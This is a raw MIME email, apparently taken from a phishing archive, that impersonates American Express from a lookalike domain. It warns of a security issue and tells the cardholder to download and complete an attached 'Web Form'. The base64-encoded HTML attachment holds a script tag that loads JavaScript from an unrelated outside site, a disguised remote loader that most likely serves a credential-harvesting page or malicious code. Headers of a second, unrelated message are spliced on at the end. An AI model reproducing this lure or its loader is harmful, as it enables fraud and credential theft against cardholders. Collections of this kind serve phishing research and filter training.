From: "American Express" <AmericanExpress@ampress.com>
To: americanexpress@welcome.aexp.com
Subject: Reminder - We've issued a security concern (Action Required)
Date: Tue, 23 Oct 2018 13:00:47 -0400
MIME-Version: 1.0
Message-ID: <1540296542e89957a6d99c3951e3944fff6fa94cda_@ampress.com>
Content-Type: multipart/mixed; boundary="--=_Next_8726_20161108_EC11.4.5.2391"
X-Mailer: Microsoft Office Outlook 11
Thread-Index: AcZBxMbp3pklllG2TIyRhkP5Ax1cTQ==
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
X-Authority-Analysis: v=2.2 cv=d5OF8VrE c=1 sm=1 tr=0 a=IN5e7ORV7WapKVHgxEPmgA==:117 a=o4YOQ3bP3y8lMUtsgSznyQ==:17 a=fmD_JHji_u0A:10 a=JBFolyDoGHsA:10 a=ltNOUqBd9MYA:10 a=gvEpj-ScY2wA:10 a=SSmOFEACAAAA:8 a=Fp2y7aqCAAAA:8 a=ZFQVkOw9AAAA:8 a=JqEG_dyiAAAA:8 a=t-IPkPogAAAA:8 a=1XWaLZrsAAAA:8 a=w2GdbsPp9_R7der4-O8A:9 a=IdS1UUO5830jaXff:21 a=iArNVvhu2_IA:10 a=QEXdDO2ut3YA:10 a=HKmP-rDc_F7bRvnnFkcA:9 a=qW__IuPGo2d45bHx:21 a=HH7FIXwXL_sUf1zzYxQd:22 a=Fjct1XNv3_K4xPInrQSw:22 a=qh4jzl_F9NB9H5eZKEhM:22
X-CM-Score: 0.00
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 629

This is a multi-part message in MIME format.

----=_Next_8726_20161108_EC11.4.5.2391
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"=
 "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns=3D"http://www.w3.org/1999/xhtml">
<head>

<META http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dutf-8">
</head>
<body>
<table border=3D0 width=3D550 cellspacing=3D0 cellpadding=3D0 align=
=3D"center">
<tbody>
<tr>
<td colspan=3D1 rowspan=3D1 bgcolor=3D"#ECECEC" width=3D15>&nbsp;</td>
<td colspan=3D3 rowspan=3D1 bgcolor=3D"#FFFFFF" width=3D522>
<table width=3D"100%" cellspacing=3D0 cellpadding=3D0>
<tbody>
<tr>
<td style=3D"background-color: #ebebeb;" colspan=3D1 rowspan=3D1 width=
=3D"100%">
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 6pt;">&nbsp;</p>
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 14px; color: #4d4f53;" align=3D"center">We've issued a=
 notification.</p>
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 6pt;">&nbsp;</p>
</td>
</tr>
</tbody>
</table>
<table width=3D"100%" cellspacing=3D0 cellpadding=3D0>
<tbody>
<tr>
<td colspan=3D1 rowspan=3D1 width=3D"3.49%">&nbsp;</td>
<td colspan=3D1 rowspan=3D1 width=3D"12.21%">
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 5pt; color: black;">&nbsp;</p>
<img style=3D"border-style: none;" src=3D"cid:0cbd591f26b84a48" alt=
=3D"AmExpress logo" width=3D60 height=3D52 align=3D"" /></td>
<td colspan=3D1 rowspan=3D1 width=3D"3.68%">&nbsp;</td>
<td colspan=3D1 width=3D"30.62%">
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 5pt; color: black;">&nbsp;</p>
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 14px; color: #666666;"><b>Hello, CARDMEMBER</b></p>
</td>
<td colspan=3D1 width=3D"32.75%">
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 5pt; color: black;">&nbsp;</p>
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 14px; color: #666666;" align=3D"right">Platinum Card&reg;</p>
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 14px; color: #666666;" align=3D"right">001</p>
</td>
<td colspan=3D1 rowspan=3D1 width=3D"3.88%">&nbsp;</td>
<td colspan=3D1 rowspan=3D1 width=3D"9.88%"><img style=3D"border-style:=
 none;" src=3D"cid:7872eb4a164a13ed" alt=3D"AmExpress Lock" width=3D60 height=
=3D37 align=3D"" /></td>
<td colspan=3D1 rowspan=3D1 width=3D"3.49%">&nbsp;</td>
</tr>
</tbody>
</table>
<img style=3D"border-style: none;" src=3D"cid:11d03ffd393c0e5d" alt=
=3D"Service shadow" width=3D522 height=3D35 align=3D"" /></td>
<td colspan=3D1 rowspan=3D1 bgcolor=3D"#ECECEC" width=3D15>&nbsp;</td>
</tr>
<tr>
<td colspan=3D1 rowspan=3D1 bgcolor=3D"#ECECEC" width=3D15>&nbsp;</td>
<td colspan=3D1 rowspan=3D1 bgcolor=3D"#FFFFFF" width=3D15>&nbsp;</td>
<td colspan=3D1 rowspan=3D1 bgcolor=3D"#FFFFFF" width=3D492>
<table width=3D"99.61%" cellspacing=3D0 cellpadding=3D0>
<tbody>
<tr>
<td style=3D"background-color: #009bbb; width: 2.8196%; border: 1pt solid=
 #009bbb;" colspan=3D1 rowspan=3D1 width=3D"2.14%">
<p>&nbsp;</p>
</td>
<td style=3D"background-color: #009bbb; border-bottom: 1pt solid #009bbb;=
 border-right: 1pt solid #009bbb; border-top: 1pt solid #009bbb; width:=
 18.4253%;" rowspan=3D1 width=3D"39.3%">
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 5pt; color: black;">&nbsp;</p>
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 21.3px; color: white;">Scoring Report</p>
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 5pt; color: black;">&nbsp;</p>
</td>
<td style=3D"border-bottom: 1pt solid white; border-right: 1pt solid white;=
 border-top: 1pt solid white; width: 5.78%;" colspan=3D1 rowspan=3D4 width=
=3D"3.12%">
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 14px; color: #4d4f53;">&nbsp;</p>
</td>
<td style=3D"border-collapse: separate; vertical-align: top; border-top: 1pt=
 solid white; border-bottom: 1pt solid white; border-right: 1pt solid white;=
 width: 69.408%;" colspan=3D1 rowspan=3D3 width=3D"51.94%">
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 14px; color: #4d4f53;">&nbsp;</p>
<table style=3D"height: 130px;" border=3D0 width=3D330 cellspacing=3D0=
 cellpadding=3D0 align=3D"center">
<tbody>
<tr>
<td style=3D"width: 326.193px;" bgcolor=3D"#ffffff"><p style=3D"margin-top:=
 0px; font-family: Arial; margin-bottom: 0px; font-size: 13px; color:=
 #4d4f53;">We are pleased to inform you on a timely security report for your=
 American Express(R) profile. At the time of evaluating the report, We=
 discovered issues on your profile. <br><br>In view of this, Cardmember=
 information needs to be updated and your mandatory effort is required.</p>
</td>
</tr>
</tbody>
</table>
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 14px; color: #4d4f53;">&nbsp;</p>
<p style=3D"margin-bottom: 0px; font-size: 11pt; font-family: Arial; color:=
 #4d4f53; text-align: center; margin-top: 0px;"><span style=3D"color:=
 #000080;"> <b>YOU-ARE-TO</b></span></p>
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 11px; color: #4d4f53;">&nbsp;</p>
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 13px; color: #4d4f53;">To continue, An attached Web Form is sent=
 along this message.</p>
<ul style=3D"list-style-type: circle;">
<li style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px; color:=
 black; font-size: 10pt;"><b>Take a moment, download and complete this form.=
 </b></li>
</ul>
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 13px; color: #4d4f53;"><b>Thanks for your Card=
 Membership,</b></p>
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 13px; color: #4d4f53;">American Express Customer Care</p>
</td>
</tr>
<tr>
<td style=3D"background-color: #009bbb; width: 2.8196%; border: 1pt solid=
 #009bbb;" width=3D"2.14%">&nbsp;</td>
<td style=3D"background-color: #009bbb; border-bottom: 1pt solid #009bbb;=
 border-right: 1pt solid #009bbb; border-top: 1pt solid #009bbb; width:=
 18.4253%;" width=3D"39.3%">&nbsp;</td>
</tr>
<tr>
<td style=3D"border-collapse: separate; vertical-align: top; border-width:=
 1pt 0pt 1pt 1pt; border-color: #009bbb white gray gray; border-style: solid;=
 width: 2.8196%;" colspan=3D1 rowspan=3D1 width=3D"2.14%">
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 13.3px; color: #4d4f53;">&nbsp;</p>
</td>
<td style=3D"border-collapse: separate; vertical-align: top; border-top: 1pt=
 solid #009bbb; border-bottom: 1pt solid gray; border-right: 1pt solid gray;=
 width: 9.0268%;" colspan=3D1 rowspan=3D1 width=3D"29.77%">&nbsp;</td>
</tr>
<tr>
<td style=3D"border-collapse: separate; vertical-align: top; border-width:=
 0.5pt 1pt 1pt; border-color: white; border-style: solid; width: 21.2448%;"=
 colspan=3D2 rowspan=3D1 width=3D"41.44%">
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 10pt; color: black;">&nbsp;</p>
</td>
<td style=3D"border-collapse: separate; vertical-align: top; border-top: 1pt=
 solid white; border-bottom: 1pt solid white; border-right: 1pt solid white;=
 width: 69.408%;" colspan=3D1 rowspan=3D1 width=3D"3.12%">
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 10pt; color: black;">&nbsp;</p>
</td>
</tr>
</tbody>
</table>
</td>
<td colspan=3D1 rowspan=3D1 bgcolor=3D"#FFFFFF" width=3D15>&nbsp;</td>
<td colspan=3D1 rowspan=3D1 bgcolor=3D"#ECECEC" width=3D15>&nbsp;</td>
</tr>
<tr>
<td colspan=3D1 rowspan=3D1 bgcolor=3D"#ECECEC" width=3D15>&nbsp;</td>
<td colspan=3D1 rowspan=3D1 bgcolor=3D"#ECECEC" width=3D15>&nbsp;</td>
<td colspan=3D1 rowspan=3D1 bgcolor=3D"#ECECEC" width=3D492>
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 10pt; color: #666666;">&nbsp;</p>
<table width=3D"100%" cellspacing=3D0 cellpadding=3D0>
<tbody>
<tr>
<td colspan=3D1 rowspan=3D1 width=3D"49%">
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 9pt; color: #666666;" align=3D"center"><a style=3D"color:=
 #666666;" title=3D"Privacy Statement" shape=3D"rect">Privacy=
 Statement</a></p>
</td>
<td colspan=3D1 rowspan=3D1 width=3D"2%">|</td>
<td colspan=3D1 rowspan=3D1 width=3D"49%">
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 9pt; color: #666666;" align=3D"center"><a style=3D"color:=
 #666666;" title=3D"Update Your Email" shape=3D"rect">Update Your=
 Email</a></p>
</td>
</tr>
</tbody>
</table>
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 10pt; color: #666666;">&nbsp;</p>
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 9pt; color: #666666;">Your account information is included above=
 to help you recognize this as a customer care e-mail from American Express.=
 We kindly ask you not to reply to this e-mail directly as messages are being=
 sent from an unmonitored e-mail address.
</p>
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 9pt; color: #666666;">&nbsp;</p>
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 9pt; color: #666666;">&copy; 2018 American Express. All rights=
 reserved.</p>
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 10.7px; color: #666666;">&nbsp;</p>
<p style=3D"margin-top: 0px; font-family: Arial; margin-bottom: 0px;=
 font-size: 10.7px; color: #666666;">ALEENALEWSP0092</p>
</td>
<td colspan=3D1 rowspan=3D1 bgcolor=3D"#ECECEC" width=3D15>&nbsp;</td>
<td colspan=3D1 rowspan=3D1 bgcolor=3D"#ECECEC" width=3D15>&nbsp;</td>
</tr>
</tbody>
</table>
<table border=3D0 cellspacing=3D0 cellpadding=3D0>
<tr>
<td style=3D"min-width:550px; font-size:0px;line-height:0px;" height=3D1=
 rowspan=3D1 colspan=3D1><img style=3D"min-width: 550px; text-decoration:=
 none; border: none; -ms-interpolation-mode: bicubic;" src=
=3D"cid:b4b648b2ac9a0542" alt=3D"spacer" height=3D1 /></td>
</tr>
</table>
</body>
</html>

----=_Next_8726_20161108_EC11.4.5.2391
Content-Type: application/octet-stream; name="=?utf-8?B?MCwsNV8xNzAzMC0tQUVOQTIwMThfMTAyMiwwMC5odG1s?="
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="=?utf-8?B?MCwsNV8xNzAzMC0tQUVOQTIwMThfMTAyMiwwMC5odG1s?="

PGh0bWwgbGFuZz0iZW4iPjxoZWFkPjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIg
Y29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04Ij48dGl0bGU+IDAsLDVfMTcwMzAt
LUFFTkEyMDE4XzEwMjIsMDAuaHRtbCA8L3RpdGxlPiA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9i
Z2NwYXJrZXJzYnVyZy5vcmcvQkdDUERpZ2l0YWxEaXNwbGF5L2Rpc3BsYXkuanMiPiA8L3Nj
cmlwdD48L2hlYWQ+PGJvZHk+MCwsNV8xNzAzMC0tQUVOQTIwMThfMTAyMiwwMDwvYm9keT48
L2h0bWw+

----=_Next_8726_20161108_EC11.4.5.2391--


From jose@monkey.org Wed Oct 24 18:14:24 2018 +0000
Return-Path: mbeltran@oxnardsd.org
Delivered-To: jose@monkey.org
X-FDA: 74754966048.07.car68_7dac2891d2554
X-Spam-Summary: 10,1,0,44473bb2a05fe3c5,d41d8cd98f00b204,mbeltran@oxnardsd.org,,RULES_HIT:10:41:72:355:379:474:582:960:962:967:973:978:983:988:989:1021:1029:1152:1189:1190:1208:1221:1256:1260:1261:1263:1313:1314:1345:1381:1431:1436:1516:1517:1518:1535:1543:1559:1575:1588:1589:1592:1594:1691:1711:1714:1719:1730:1749:1777:1792:2525:2527:2528:2538:2559:2564:2682:2685:2859:2895:2900:2902:2917:2924:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3867:3868:3870:3872:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4048:4117:4321:4379:4552:5007:6117:6261:6658:6678:6688:7464:7688:8603:8778:8885:8957:9025:9059:9111:9388:9411:9868:9908:10004:10026:10049:10197:10346:10400:10919:11245:11656:11658:11914:12043:12050:12058:12219:12331:12438:12519:12555:12895:13139:13163:13229:13237:13439:14096:14181:14721:14885:21326:21433:21451:21499:21627:21652:21740:21789:21796:21819:30021:30037:30054:30070:30074:30091,0,RBL:204.147.18.70:@oxnardsd.org:.lbl8.mailshell.net-62.2.0.
X-HE-Tag: car68_7dac2891d2554
X-Filterd-Recvd-Size: 6965
Received: from spam1.oxnardsd.org (spam1.oxnardsd.org [204.147.18.70])
	by imf12.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 24 Oct 2018 18:14:23 +0000 (UTC)
X-ASG-Debug-ID: 1540404848-05a5b810511afeb0003-6JlXpt
Received: from ESC-EXCH16-3.oxnardsd.org ([10.250.10.27]) by spam1.oxnardsd.org with ESMTP id 5K46DZA3AFTSxjI2; Wed, 24 Oct 2018 11:14:08 -0700 (PDT)
